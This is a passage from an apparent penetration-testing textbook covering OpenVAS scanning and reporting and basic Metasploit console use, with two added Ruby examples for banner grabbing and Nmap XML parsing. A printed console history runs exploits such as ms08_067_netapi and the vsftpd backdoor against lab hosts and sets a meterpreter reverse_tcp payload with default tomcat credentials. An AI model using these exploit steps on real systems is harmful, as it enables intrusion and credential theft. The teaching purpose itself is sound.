dashboard offers a centralized view of tasks, hosts, NVTs, and so on, as 
shown in Figure 2-18. Each demographic can be exported in CSV format. 
Figure 2-18. OpenVAS dashboard with demographics 


Scheduler 


In an enterprise environment, it may happen that scans are required to run 
after business hours. In such a scenario, the OpenVAS scheduler can be 
handy. The scheduler can be accessed at Configuration > Schedules and 
can be used to trigger scans at a specific time, as shown in Figure 2-19. 


Greenbone Security Assistant - Mozilla Firefox 

Coordinated Universal Time 


Figure 2-19. OpenVAS scan scheduler 


Trashcan 


If you happen to delete any of the entities in OpenVAS and later need to 
get them back, it is possible to recover them through the trashcan. You can 
access it at Extras > Trashcan, as shown in Figure 2-20. 
Greenbone Security Assistant - Mozilla Firefox 


Figure 2-20. OpenVAS trashcan for viewing and restoring deleted 
items 


Help 


Though most of the tasks in OpenVAS are simple and easy to find, it 
may so happen that you need some help on certain topics. OpenVAS 
has comprehensive help documentation that you can access at Help > 
Contents, as shown in Figure 2-21. 
Figure 2-21. OpenVAS help content 


Vulnerability Scanning 


Now that you have OpenVAS set up and running with updated feeds, you 
can get started with scanning a live target. Here, you'll first try to scan a 
Linux system. Log into the OpenVAS web interface, as shown in Figure 2-22. 




Figure 2-22. OpenVAS login page 
The next step is to create a new scan task. To create a new scan task, go 
to Scans > Tasks, as shown in Figure 2-23. 


Greenbone Security Assistant - Mozilla Firefox 

Task Wizard 
Advanced Task Wizard 
Modify Task Wizard 

No Tasks with High severity found 


Figure 2-23. OpenVAS dashboard and task wizard 


Now you can either choose to start a simple task wizard or use an 
advanced task wizard that offers more scan flexibility. For now, you'll get 
started with the simple task wizard, as shown in Figure 2-24. All you need 
to do is enter the target IP address and click Start Scan. 
Quick start: Immediately scan an IP address 
IP address or hostname: 192.168.25.129 

As a short-cut I will do the following for you: 
  switch the view to refresh every 30 seconds so you can lean back and watch the scan progress 

When creating the Target and Task I will use the defaults as configured in "My Settings". 
By clicking the New Task icon you can create a new Task yourself. 


Figure 2-24. Initiating a new vulnerability scan in OpenVAS 


Note that OpenVAS has several predefined scan profiles. Depending 
on the specific requirement, you can choose one of the following scan 
profiles: 


• Discovery 

• Full and Fast 

• Full and Fast Ultimate 

• Full and Very Deep 

• Full and Very Deep Ultimate 

• Host Discovery 

• System Discovery 


For the default scan, the Full and Fast profile is selected. 
The scan gets initiated, and you can see the scan status is set to 
Running, as shown in Figure 2-25. The scan’s action tab provides various 
ways to pause and resume the scan if required. 
Figure 2-25. OpenVAS task status dashboard 


Once the scan is complete, you can go to Scans > Results to view the 
vulnerabilities identified during the scan, as shown in Figure 2-26. Now that 
the scan is complete, you can simply view the scan results in the OpenVAS web 
console or download a comprehensive report in the format of your choice. 
Figure 2-26. OpenVAS scan results 


It is also possible to filter out vulnerability results. For example, you may 
want to see only HTTP-related vulnerabilities. Simply go to Scans > Results, 
and on the Filter tab, enter the filter criteria, as shown in Figure 2-27. 


Figure 2-27. OpenVAS scan results and filters 


OpenVAS Additional Settings 


So far you have seen how to set up the OpenVAS virtual machine and get 
started with vulnerability scanning. OpenVAS is a flexible vulnerability 
management system that offers a lot of customization. This section talks 
about some additional OpenVAS settings that you may choose to configure 
as per your requirements. 


Performance 


OpenVAS is certainly a resource-intensive tool. It can consume a lot 
of memory and CPU. Hence, while scanning a number of systems, it is 
worthwhile to keep an eye on its performance. To view the performance 
data, go to Extras > Performance, as shown in Figure 2-28. You can view 
performance data for a custom time period by filtering the dates. 
Figure 2-28. OpenVAS resource and performance management 
summary 


CVSS Calculator 


The Common Vulnerability Scoring System (CVSS) is the baseline used 
by many security products for calculating a vulnerability’s severity. CVSS 
takes into consideration multiple parameters before computing the 
vulnerability score. OpenVAS offers a ready-to-use CVSS calculator that 
you can use to calculate vulnerability scores. You can access the CVSS 
calculator at Extras > CVSS Calculator, as shown in Figure 2-29. You can 
find more details about CVSS at https://www.first.org/cvss/. 
Figure 2-29. OpenVAS CVSS calculator 


Settings 


OpenVAS is a highly configurable system and has many settings. It can be 
really useful to get an overview of all the settings and their values in one 
place. You can go to Extras > My Settings, as shown in Figure 2-30, to get 
an overview of the settings configured so far. 
Figure 2-30. OpenVAS administrative settings 


Reporting 


So far you have learned how you can effectively use OpenVAS to scan 
target systems. Once the scan is complete, the next important step is to 
generate a detailed report. Having a comprehensive report is extremely 
critical because it will help administrators fix the identified vulnerabilities. 
OpenVAS supports multiple report formats, listed here: 


• Anonymous XML 

• ARF 

• CPE 

• CSV Hosts 

• CSV Results 

• HTML 

• ITG 

• LaTeX 

• NBE 

• PDF 

• Topology SVG 

• TXT 

• Verinice ISM 

• Verinice ITG 

• XML 


To generate a report in the required format, go to Scans > Reports, 
select the format from the drop-down menu, and click the adjacent down 
arrow to download the report, as shown in Figure 2-31. 
Figure 2-31. Export scan results 


The report contains detailed vulnerability information, as shown in 
Figure 2-32. 
Figure 2-32. OpenVAS HTML scan report 


For each vulnerability identified, the report has the following details: 


• Summary 

• Vulnerability detection result 

• Impact 

• Solution 

• Affected software/OS 

• Vulnerability insight 

• Vulnerability detection method 

• Product detection result 

• References 


Summary 


This chapter gave you an essential overview of OpenVAS, starting from its 
setup to using it to perform a vulnerability assessment. The next chapter 
will introduce you to the versatile Metasploit framework and help you 
understand how NMAP and OpenVAS can be integrated with Metasploit. 


Do-It-Yourself (DIY) Exercises 


Set up OpenVAS in VirtualBox or VMware. 


Use OpenVAS to scan one Windows host and one Unix-based host. 


Generate vulnerability reports in HTML and PDF. 
Metasploit 


The previous two chapters covered NMAP and OpenVAS, which you can 
use to perform information gathering, enumeration, and vulnerability 
assessments. Moving ahead, this chapter covers the basics of Metasploit, 
which will help you sail through the remaining phases of the penetration 
testing lifecycle. Specifically, this chapter covers the following: 


• Introduction to Metasploit 

• Overview of the Metasploit structure 

• Basic commands and configuration 

• Invoking NMAP and OpenVAS scans from Metasploit 

• Scanning services with Metasploit 

• Meterpreter basics 


Introduction to Metasploit 


Metasploit was released in 2003, when H.D. Moore developed a portable 
network tool in Perl. In 2007 it was rewritten in Ruby. The Metasploit 
project gained commercial acceptance and popularity when Rapid7 
acquired it in 2009. 

Metasploit is not just a single tool. It is a complete framework. It is 
extremely robust and flexible and has tons of tools to perform various 
simple and complex tasks. It has a unique ability to perform almost all the 
tasks involved in the penetration testing lifecycle. By using Metasploit, you 
don’t need to reinvent the wheel; you just focus on the penetration testing 
objectives, and all the supporting actions can be performed using various 
components of the framework. 

While Metasploit is powerful and capable, you need to clearly 
understand its structure and components to use it efficiently. 

Metasploit has three editions available. 


• Metasploit Pro 

• Metasploit Community 

• Metasploit Framework 


For the scope of this book, we’ll be using the Metasploit Framework 
edition. 


Anatomy and Structure of Metasploit 


Before jumping into the actual framework commands, you first need to 
understand the structure of Metasploit. The best and easiest way to get 
to know the overall Metasploit structure is to simply browse through its 
directory. In Kali Linux, Metasploit is by default located at /usr/share/ 
metasploit-framework, as shown in Figure 3-1. 
root@kali:~# cd /usr/share/metasploit-framework/ 
root@kali:/usr/share/metasploit-framework# ls 
app            Gemfile.lock                  msfdb      Rakefile         tools 
config         lib                           msfrpc     ruby             vendor 
data           metasploit-framework.gemspec  msfrpcd    script-exploit 
db             modules                       msfupdate  script-password 
documentation  msfconsole                    msfvenom   script-recon 
Gemfile        msfd                          plugins    scripts 
root@kali:/usr/share/metasploit-framework# 


Figure 3-1. The Metasploit directory structure 


You can see that Metasploit has a well-defined structure classifying its 
various components into different categories. 
At a high level, Metasploit can be visualized as shown in Figure 3-2. 


Metasploit Framework 


Figure 3-2. Various components of Metasploit 
Auxiliaries 


Auxiliaries are the modules that make Metasploit so flexible. A Metasploit 
auxiliary is nothing but a piece of code specifically written to perform a 
task. For example, you may want to check whether a particular FTP server 
is allowing anonymous access or whether your web server is vulnerable to 
the Heartbleed attack. For all these tasks, there exists an auxiliary module. 

In fact, Metasploit has more than 1,000 auxiliary modules classified 
into 19 categories. The following are the auxiliary categories available in 
Metasploit: 

Admin      Analyze      Bnat 
Client     Crawler      Docx 
Dos        Fileformat   Fuzzers 
Gather     Parser       Pdf 
Scanner    Server       Sniffer 
Spoof      Sqli         Voip 
Vsploit 


Payloads 


You have already learned that an exploit is the piece of code that will 
be used against the vulnerable component. The exploit code may run 
successfully, but what you want to happen once the exploit is successful is 
defined by the payload. In simple terms, a payload is the action that needs 
to be performed after the execution of an exploit. For example, if you want 
to create a reverse shell back to your system, then you need to select the 
appropriate Metasploit payload for that. Metasploit has about 42 payloads 
in the following categories: 


Singles Stagers Stages 


Exploits 


Exploits are an extremely important part of Metasploit. The whole purpose 
of the framework is to offer exploits for various vulnerabilities. An exploit is 
the actual code that will execute on the target system to take advantage of 
the vulnerability. Metasploit has more than 1,800 exploits in 17 categories. 
The following are the various categories of exploits available in 
Metasploit: 

Aix        Android      Apple_ios 
Bsdi       Dialup       Firefox 
Freebsd    Hpux         Irix 
Linux      Mainframe    Multi 
Netware    Osx          Solaris 
Unix       Windows 

Encoders 


Metasploit helps you generate a wide variety of payloads that you can send 
to the target in multiple ways. In the process, it is quite possible that your 
payload gets detected by antivirus software or any of the security software 
present on the target system. This is where encoders can be of help. 
Encoders use various techniques and algorithms to obfuscate the payload 
in a way that it doesn't get detected by antivirus software. Metasploit has 
about 40 encoders in ten categories, as shown here: 


Cmd        Generic 
Mipsbe     Mipsle 
Php        Ppc 
Ruby       Sparc 
X64        X86 


Post-Exploitation Activities (Post) 


Once you have gained basic access to your target system using any of 
the available exploits, you can use the post modules to further infiltrate 
the target system. These modules help you in all the post-exploitation 
activities including the following: 

• Escalating user privileges to root or administrator 

• Retrieving the system credentials 

• Stealing cookies and saved credentials 

• Capturing keystrokes on the target system 

• Executing custom PowerShell scripts for performing additional tasks 

• Making the access persistent 

Metasploit has about 311 post-exploitation modules in the following 
11 categories: 

aix, android, cisco, firefox, hardware, juniper, linux, multi, osx, 
solaris, windows 


Basic Commands and Configuration 


Now that you are aware of the basic structure and anatomy of Metasploit, 
you can get started with its interface. To access Metasploit, open the 
terminal and type the command msfconsole, as shown in Figure 3-3. 

root@kali:~# msfconsole 
[ASCII-art banner] 
       =[ metasploit v4.17.7-dev                          ] 
+ -- --=[ 1801 exploits - 1027 auxiliary - 311 post       ] 
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 

Figure 3-3. The initial screen of MSFconsole 


help 


Once you have opened MSFconsole, you can get information about all the 
basic commands using the help command, as shown in Figure 3-4. 
msf > help 

Core Commands 
============= 

    Command    Description 
    -------    ----------- 
    ?          Help menu 
    banner     Display an awesome metasploit banner 
    cd         Change the current working directory 
    color      Toggle color 
    connect    Communicate with a host 
    exit       Exit the console 
    get        Gets the value of a context-specific variable 
    getg       Gets the value of a global variable 
    grep       Grep the output of another command 
    help       Help menu 
    history    Show command history 
    load       Load a framework plugin 
    quit       Exit the console 
    route      Route traffic through a session 
    save       Saves the active datastores 
    sessions   Dump session listings and display information about sessions 
    set        Sets a context-specific variable to a value 
    setg       Sets a global variable to a value 
    sleep      Do nothing for the specified number of seconds 
    spool      Write console output into a file as well the screen 
    threads    View and manipulate background threads 
    unload     Unload a framework plugin 
    unset      Unsets one or more context-specific variables 
    unsetg     Unsets one or more global variables 
    version    Show the framework and console library version numbers 

Module Commands 
=============== 

    Command       Description 
    -------       ----------- 
    advanced      Displays advanced options for one or more modules 
    back          Move back from the current context 
    info          Displays information about one or more modules 
    loadpath      Searches for and loads modules from a path 
    options       Displays global options or for one or more modules 
    popm          Pops the latest module off the stack and makes it active 
    previous      Sets the previously loaded module as the current module 
    pushm         Pushes the active or list of modules onto the module stack 
    reload_all    Reloads all modules from all defined module paths 
    search        Searches module names and descriptions 
    show          Displays modules of a given type, or all modules 
    use           Selects a module by name 

Figure 3-4. The output of the help command in MSFconsole 


version 


Vulnerabilities get discovered quickly, and the corresponding exploit code 
is also often released soon after. Therefore, it is important that Metasploit is 
up-to-date and has the latest set of exploit code. To check the framework 
version, use the version command, as shown in Figure 3-5. You can then 
compare this version with the latest release in the Metasploit Git repository 
(https://github.com/rapid7/metasploit-framework). On Kali Linux the 
framework is updated through the package manager (apt update && apt 
install metasploit-framework) rather than from within MSFconsole. 

msf > version 
Framework: 4.17.7-dev 
Console  : 4.17.7-dev 
msf > 

Figure 3-5. The output of the version command in MSFconsole 


connect 


We are all aware of utilities such as Telnet, SSH, and Netcat that help us in 
remote administration. Metasploit has a built-in utility called connect that 
can be used to establish a raw TCP connection and interact with a remote 
system. It supports SSL, proxies, pivoting through sessions, and file 
transfers. The connect command needs a valid IP address and port, as shown 
in Figure 3-6. In this example the FTP service announces itself as vsftpd 
2.3.4 in its greeting banner; this kind of version string is exactly what 
you later feed to the search command to find a matching exploit. 

msf > connect 192.168.25.129 21 
[*] Connected to 192.168.25.129:21 
220 (vsFTPd 2.3.4) 

Figure 3-6. The output of the connect command in MSFconsole 
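As an added example (not code from the book or from Metasploit), the following Ruby script does by hand what connect does in Figure 3-6: it opens a TCP connection, reads whatever the service volunteers before any client input, and pulls the product and version out of an FTP greeting. Because it has to run offline, it also starts a throwaway TCP server on localhost that replies with a constructed vsftpd-style banner; that server, the banner text, and all function names are assumptions made for this example, not part of the framework.

```ruby
require 'socket'

# Open a TCP connection, wait up to `timeout` seconds for the service to
# speak first, and return the raw greeting (nil if it says nothing).
# This is the manual equivalent of `connect <host> <port>` in msfconsole.
def grab_banner(host, port, timeout: 3.0)
  sock = Socket.tcp(host, port, connect_timeout: timeout)
  # FTP, SMTP and SSH send a banner unprompted; an HTTP server would not,
  # so the select keeps us from blocking forever on a silent service.
  return nil unless IO.select([sock], nil, nil, timeout)
  sock.readpartial(4096)
rescue EOFError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
  nil
ensure
  sock&.close
end

# An FTP greeting is "220 <text>"; vsftpd announces itself as "220 (vsFTPd X.Y.Z)".
# Returns { product:, version: } or nil when the banner is not an FTP greeting.
def parse_ftp_banner(banner)
  return nil if banner.nil?
  line = banner.lines.first.to_s.strip
  return nil unless line.start_with?('220')
  if (m = line.match(/\(vsFTPd ([\d.]+)\)/))
    { product: 'vsftpd', version: m[1] }
  else
    { product: 'unknown', version: nil }
  end
end

# Turn the parsed banner into the string you would type after `search`.
def search_term(info)
  return nil if info.nil? || info[:version].nil?
  "#{info[:product]} #{info[:version]}"
end

# Constructed stand-in for a target: a local listener that greets every
# client with the given banner and hangs up. Returns the port it listens on.
def start_fake_banner_server(banner)
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    loop do
      client = server.accept
      client.write(banner)
      client.close
    end
  end
  server.addr[1]
end

if __FILE__ == $PROGRAM_NAME
  port = start_fake_banner_server("220 (vsFTPd 2.3.4)\r\n") # constructed sample banner
  banner = grab_banner('127.0.0.1', port)
  info = parse_ftp_banner(banner)
  puts "banner: #{banner.to_s.strip}"
  puts "search: #{search_term(info)}"
end
```

Point grab_banner at a real host and port to reproduce the connect output; the select timeout is what distinguishes a service that stays silent until spoken to from a dead port.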
history 

MSFconsole is entirely operated on the command line, and for each task to 
be performed, you need to type in some command. To see the commands 
you have used so far in MSFconsole, you can use the history command, 
as shown in Figure 3-7. The history is also written to disk in 
~/.msf4/history and keeps every argument exactly as typed, so passwords 
passed on the command line (such as the set HTTPPASSWORD tomcat entry 
below) end up in that file. 

msf > history 
 49  exploit 
 50  use exploit/windows/smb/ms08_067_netapi 
 51  set RHOST 10.216.245.55 
 52  exploit 
 53  sessions -i 
 54  exit 
 55  exit 
 56  use exploit/windows/smb/ms08_067_netapi 
 57  show options 
 58  set RHOST 192.168.25.130 
 59  exploit 
 60  exit 
 61  use exploit/windows/smb/ms08_067_netapi 
 62  set RHOST 192.168.25.130 
 63  exploit 
 64  search vsftp 
 65  use exploit/unix/ftp/vsftpd_234_backdoor 
 66  show options 
 67  set RHOST 192.168.25.129 
 68  exploit 
 69  back 
 70  search tomcat 
 71  search tomcat_mgr 
 72  use exploit/multi/http/tomcat_mgr_deploy 
 73  set PAYLOAD java/meterpreter/reverse_tcp 
 74  show options 
 75  set RHOST 192.168.25.129 
 76  set LHOST 192.168.25.128 
 77  set HTTPUSERNAME tomcat 
 78  set HTTPPASSWORD tomcat 
 79  set target 0 
 80  set RPORT 8180 
 81  use exploit/windows/smb/ms08_067_netapi 
 82  set RHOST 192.168.25.130 
 83  exploit 
 84  back 
 85  use exploit/windows/smb/ms08_067_netapi 
 86  set RHOST 192.168.25.136 
 87  exploit 
 88  exit 
 89  use exploit/windows/smb/ms08_067_netapi 
 90  set RHOST 192.168.25.130 
 91  exploit 
 92  use auxiliary/analyze/jtr_crack_fast 
 93  run 
 94  db_connect 
 95  db_status 
 96  db_connect 
 97  db_connect 
 98  exit 
 99  exit 
100  db_connect 
101  db_rebuild_cache 
102  db_status 

Figure 3-7. The output of the history command in MSFconsole 
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set and setg 


Metasploit has some variables (module options) that need to be set before 
you execute any module or exploit. These variables live in two datastores. 

• Local (module datastore): values set with set apply only to the 
module currently selected with use; when you switch to another 
module, they do not carry over. 

• Global: values set with setg are stored in the framework-wide 
datastore and are picked up by every module that has an option of 
that name, unless the module has its own local value for it. 

The set command defines local variables, while setg defines global 
variables, as shown in Figure 3-8. Running set with no arguments lists 
the current values; here nothing has been set yet. Note that at the plain 
msf > prompt in the figure no module is selected, so there is no module 
datastore and set writes to the global datastore just as setg does; the 
difference only shows once a module is in use. A typical pattern is setg 
LHOST for your own address, which every reverse payload needs, while 
RHOST changes per target and is better kept local. 

msf > set 
Global 
====== 

No entries in data store. 

msf > set RHOST 192.168.25.129 
RHOST => 192.168.25.129 
msf > setg RHOST 192.168.25.129 
RHOST => 192.168.25.129 
msf > 

Figure 3-8. The output of the set and setg commands in 
MSFconsole 
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get and getg 


In the previous section, you saw how to set values of local and global 
variables. Once these values are set, you can see those values using the get 
and getg commands, as shown in Figure 3-9. The get command fetches 
the values of local variables, while the getg command fetches the values of 
global variables. 

msf > get 
Usage: get var1 [var2 ...] 

The get command is used to get the value of one or more variables. 

msf > getg 
Usage: getg var1 [var2 ...] 

Exactly like get -g, get global variables 

msf > get RHOST 
RHOST => 192.168.25.129 
msf > getg RHOST 
RHOST => 192.168.25.129 
msf > 

Figure 3-9. The output of the get and getg commands in 
MSFconsole 


unset and unsetg 


The unset command is used to remove values assigned to a local variable, 
while the unsetg command is used to remove values assigned to a global 
variable, as shown in Figure 3-10. 

msf > unset RHOST 
Unsetting RHOST... 
msf > unsetg RHOST 
Unsetting RHOST... 
msf > get RHOST 
RHOST => 
msf > getg RHOST 
RHOST => 
msf > 

Figure 3-10. The output of the unset and unsetg commands in 
MSFconsole 


save 


While working on a penetration testing project, it might happen that you 
configure lots of global variables and settings. You certainly don't want to 
lose these settings; the save command writes the current configuration to 
a file, as shown in Figure 3-11. The file is plain text under ~/.msf4 and is 
read again the next time MSFconsole starts, so any credentials held in the 
datastore (for example HTTPPASSWORD) are stored unprotected alongside 
everything else; treat the ~/.msf4 directory as sensitive project material. 

msf > save 
Saved configuration to: /root/.msf4/config 
msf > 

Figure 3-11. The output of the save command in MSFconsole 
info 

There are tons of modules and plug-ins available in Metasploit. It is 
impossible to know all of them. Whenever you want to use any module, 
you can find out more details about it using the info command, as shown 
in Figure 3-12. Simply supply the module name as a parameter to the info 
command to get its details. 

msf > info -h 
Usage: info <module name> [mod2 mod3 ...] 

Options: 
* The flag '-j' will print the data in json format 
* The flag '-d' will show the markdown version with a browser. More info, but could be slow. 
Queries the supplied module or modules for information. If no module is given, 
show info for the currently active module. 

msf > info payload/windows/meterpreter/reverse_tcp 

       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager 
     Module: payload/windows/meterpreter/reverse_tcp 
   Platform: Windows 
       Arch: x86 
Needs Admin: No 
 Total size: 283 
       Rank: Normal 

Provided by: 
  skape <mmiller@hick.org> 
  sf <stephen_fewer@harmonysecurity.com> 
  OJ Reeves 
  hdm <x@hdm.io> 

Basic options: 
Name      Current Setting  Required  Description 
----      ---------------  --------  ----------- 
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none) 
LHOST                      yes       The listen address (an interface may be specified) 
LPORT     4444             yes       The listen port 

Description: 
  Inject the meterpreter server DLL via the Reflective DLL Injection 
  payload (staged). Connect back to the attacker 

msf > 

Figure 3-12. The output of the info command in MSFconsole 
irb 

Metasploit is written in Ruby. The irb command drops you into an 
Interactive Ruby (irb) shell running inside the framework process, where 
you can execute arbitrary Ruby with full access to the framework object 
(for example, framework.sessions) and to the module currently in use. 
This is useful for scripting post-exploitation steps that no existing 
module covers. Simply type in the irb command, as shown in Figure 3-13, 
to get into the irb shell. To learn more about Ruby programming, refer to 
https://www.ruby-lang.org/en/. 

msf > irb 
[*] Starting IRB shell 

>> print "Hello Metasploit" 
Hello Metasploit=> nil 

Figure 3-13. The output of the irb command in MSFconsole 


show 


In the initial part of this chapter you saw various components of Metasploit 
including auxiliaries, exploits, payloads, and so on. Using the show 
command, as shown in Figure 3-14, you can list the contents of each 
category. For example, you can use the show auxiliary command to list 
all the auxiliary modules available within the framework, and show 
payloads lists the payloads. Once a module has been selected with use, 
show options lists the variables it needs and show payloads is narrowed 
to only the payloads compatible with that module. 

[Figure content not recoverable from the source.] 

Figure 3-14. The output of the show command in MSFconsole 
spool 

You already saw the save command, which writes the configuration to 
a file. In a particular scenario, you may want to save the output of all 
modules and commands you execute. The spool command, as shown in 
Figure 3-15, logs all the console output to a specified file; spool off 
stops the logging. 

msf > spool 
Usage: spool <off>|<filename> 

Example: 
  spool /tmp/console.log 

msf > spool /root/Desktop/msf.log 
[*] Spooling to file /root/Desktop/msf.log... 
msf > 

Figure 3-15. The output of the spool command in MSFconsole 


makerc 


Automation plays an important role in any framework. It is always helpful 
to automate a bunch of repetitive tasks to save time and effort. The makerc 
command, as shown in Figure 3-16, helps you automate Metasploit tasks 
by saving the commands you have typed in this session as a resource 
script. A resource script is replayed with the resource <file> command 
inside MSFconsole or with msfconsole -r <file> from the shell, which is 
convenient for setting up a listener or a scan the same way every time. 
Because it records the commands verbatim, review the file for hard-coded 
credentials before sharing it. 

msf > makerc 
Usage: makerc <output rc file> 

Save the commands executed since startup to the specified file. 

msf > makerc /root/Desktop/msfcommands.txt 
[*] Saving last 49 commands to /root/Desktop/msfcommands.txt ... 
msf > 

Figure 3-16. The output of the makerc command in MSFconsole 
db_initiate 

Considering the complex nature of Metasploit, it is natural that there must 
exist some database that can be used to store the task's data (hosts, 
services, credentials, and loot). Metasploit is by default integrated with 
the PostgreSQL database. You first need to start the database service by 
executing the systemctl start postgresql command followed by the msfdb 
init command, as shown in Figure 3-17. msfdb init creates the msf database 
user and databases and writes the connection details, including the 
generated database password, to database.yml; MSFconsole reads that file 
on startup. 

root@kali:~# systemctl start postgresql 
root@kali:~# msfdb init 
[i] Database already started 
[+] Creating database user 'msf' 
[+] Creating databases 'msf' 
[+] Creating databases 'msf_test' 
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' 
[+] Creating initial database schema 
root@kali:~# 

Figure 3-17. The output of the systemctl and msfdb init commands 
in the terminal 


db_ status 


Once you have initialized the database, you can confirm that Metasploit is 
connected to it by executing the command db_status in MSFconsole, as 
shown in Figure 3-18. 

msf > db_status 
[*] postgresql connected to msf 
msf > 

Figure 3-18. The output of the db_status command in MSFconsole 
workspace 

At times, it may happen that you are required to work on multiple 
penetration testing projects simultaneously. You certainly don't want to 
mix up data from multiple projects. Metasploit offers efficient workspace 
management. For each new project, you can create a new workspace 
and thereby restrict the project data to that workspace. The workspace 
command, as shown in Figure 3-19, lists the available workspaces. You can 
create a new workspace using the command workspace -a <name> and 
switch to an existing one with workspace <name>. The asterisk marks the 
active workspace, which is where db_nmap, db_import, and the hosts and 
services commands read and write. 

msf > workspace -h 
Usage: 
    workspace                  List workspaces 
    workspace -v               List workspaces verbosely 
    workspace [name]           Switch workspace 
    workspace -a [name] ...    Add workspace(s) 
    workspace -d [name] ...    Delete workspace(s) 
    workspace -D               Delete all workspaces 
    workspace -r <old> <new>   Rename workspace 
    workspace -h               Show this help information 

msf > workspace 
* default 
msf > workspace -a sagar 
[*] Added workspace: sagar 
msf > workspace 
  default 
* sagar 
msf > 

Figure 3-19. The output of the workspace command in 
MSFconsole 
Invoking NMAP and OpenVAS Scans 
from Metasploit 


This section introduces how you can invoke and initiate NMAP and 
OpenVAS scans from within the Metasploit console. 


NMAP 


You learned about NMAP earlier in this book. You saw that NMAP can be 
triggered from the command-line interface or the ZENMAP graphical user 
interface. However, there is yet another way to initiate NMAP scans, and 
that’s through the Metasploit console. 

It can be helpful to import the NMAP scan results into Metasploit and 
then further exploit the open services. There are two ways this can be 
achieved. 


• Importing NMAP scans: You are aware that NMAP has 
an ability to generate and save scan output in XML 
format. You can simply import the NMAP XML output 
into Metasploit using the db_import command, as 
shown in Figure 3-20. 
msf > db_import /root/Desktop/nmap.xml 
[*] Importing 'Nmap XML' data 
[*] Import: Parsing with 'Nokogiri v1.8.4' 
[*] Importing host 192.168.25.129 
[*] Successfully imported /root/Desktop/nmap.xml 
msf > hosts 

Hosts 
===== 

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments 
-------         ---                ----  -------  ---------  -----  -------  ----  -------- 
192.168.25.129  00:0c:29:11:8e:b1        Unknown                    device 

msf > 

Figure 3-20. The output of the db_import and hosts commands in 
MSFconsole 


• Invoking NMAP from within MSFconsole: Metasploit 
offers the command db_nmap, which can be used to 
initiate NMAP scans directly from within the Metasploit 
console, as shown in Figure 3-21. 
msf > db_nmap 192.168.25.129 
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-24 11:23 IST 
[*] Nmap: Nmap scan report for 192.168.25.129 
[*] Nmap: Host is up (0.0042s latency). 
[*] Nmap: Not shown: 977 closed ports 
[*] Nmap: PORT     STATE SERVICE 
[*] Nmap: 21/tcp   open  ftp 
[*] Nmap: 22/tcp   open  ssh 
[*] Nmap: 23/tcp   open  telnet 
[*] Nmap: 25/tcp   open  smtp 
[*] Nmap: 53/tcp   open  domain 
[*] Nmap: 80/tcp   open  http 
[*] Nmap: 111/tcp  open  rpcbind 
[*] Nmap: 139/tcp  open  netbios-ssn 
[*] Nmap: 445/tcp  open  microsoft-ds 
[*] Nmap: 512/tcp  open  exec 
[*] Nmap: 513/tcp  open  login 
[*] Nmap: 514/tcp  open  shell 
[*] Nmap: 1099/tcp open  rmiregistry 
[*] Nmap: 1524/tcp open  ingreslock 
[*] Nmap: 2049/tcp open  nfs 
[*] Nmap: 2121/tcp open  ccproxy-ftp 
[*] Nmap: 3306/tcp open  mysql 
[*] Nmap: 5432/tcp open  postgresql 
[*] Nmap: 5900/tcp open  vnc 
[*] Nmap: 6000/tcp open  X11 
[*] Nmap: 6667/tcp open  irc 
[*] Nmap: 8009/tcp open  ajp13 
[*] Nmap: 8180/tcp open  unknown 
[*] Nmap: MAC Address: 00:0C:29:11:8E:B1 (VMware) 
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds 
msf > hosts 

Hosts 
===== 

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments 
-------         ---                ----  -------  ---------  -----  -------  ----  -------- 
192.168.25.129  00:0c:29:11:8e:b1        Unknown                    device 

msf > 

Figure 3-21. Invoking NMAP from MSFconsole using the db_nmap 
command 


Once the NMAP scan is complete, you can use the hosts command to 
confirm that the target has been added to the Metasploit database, and 
the services command to list the open ports it recorded. db_nmap accepts 
the same arguments as NMAP itself, so a version scan such as 
db_nmap -sV 192.168.25.129 stores service names and versions that you 
can later match against exploits with the search command. 
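To make the db_import step concrete, here is an added Ruby example (not code from the book or from Metasploit) that parses the same Nmap XML format db_import reads and extracts what Metasploit stores as hosts and services: address, MAC, open ports, and the product and version a -sV scan records per service. The XML document is a constructed sample modelled on the target above, not real scan output, and the function names are this example's own. It goes one step beyond the figures by turning the recorded versions into the strings you would pass to the search command.

```ruby
require 'rexml/document'

# Constructed Nmap XML sample, shaped like the output of
# `nmap -sV -oX nmap.xml 192.168.25.129` but trimmed to three ports.
# Not real scan output.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV -oX nmap.xml 192.168.25.129" version="7.60">
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="192.168.25.129" addrtype="ipv4"/>
      <address addr="00:0C:29:11:8E:B1" addrtype="mac" vendor="VMware"/>
      <ports>
        <port protocol="tcp" portid="21">
          <state state="open" reason="syn-ack"/>
          <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
        </port>
        <port protocol="tcp" portid="22">
          <state state="open" reason="syn-ack"/>
          <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" method="probed" conf="10"/>
        </port>
        <port protocol="tcp" portid="23">
          <state state="closed" reason="reset"/>
          <service name="telnet" method="table" conf="3"/>
        </port>
      </ports>
    </host>
  </nmaprun>
XML

# Parse Nmap XML into the shape db_import stores: one record per host,
# each with its ports and whatever service fingerprint Nmap recorded.
def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, '//host').map do |host|
    ipv4 = REXML::XPath.first(host, 'address[@addrtype="ipv4"]')
    mac  = REXML::XPath.first(host, 'address[@addrtype="mac"]')
    ports = REXML::XPath.match(host, 'ports/port').map do |port|
      state = REXML::XPath.first(port, 'state')
      svc   = REXML::XPath.first(port, 'service')
      {
        port:    port.attributes['portid'].to_i,
        proto:   port.attributes['protocol'],
        state:   state && state.attributes['state'],
        service: svc && svc.attributes['name'],
        product: svc && svc.attributes['product'],
        version: svc && svc.attributes['version'],
      }
    end
    { address: ipv4 && ipv4.attributes['addr'],
      mac:     mac && mac.attributes['addr'],
      ports:   ports }
  end
end

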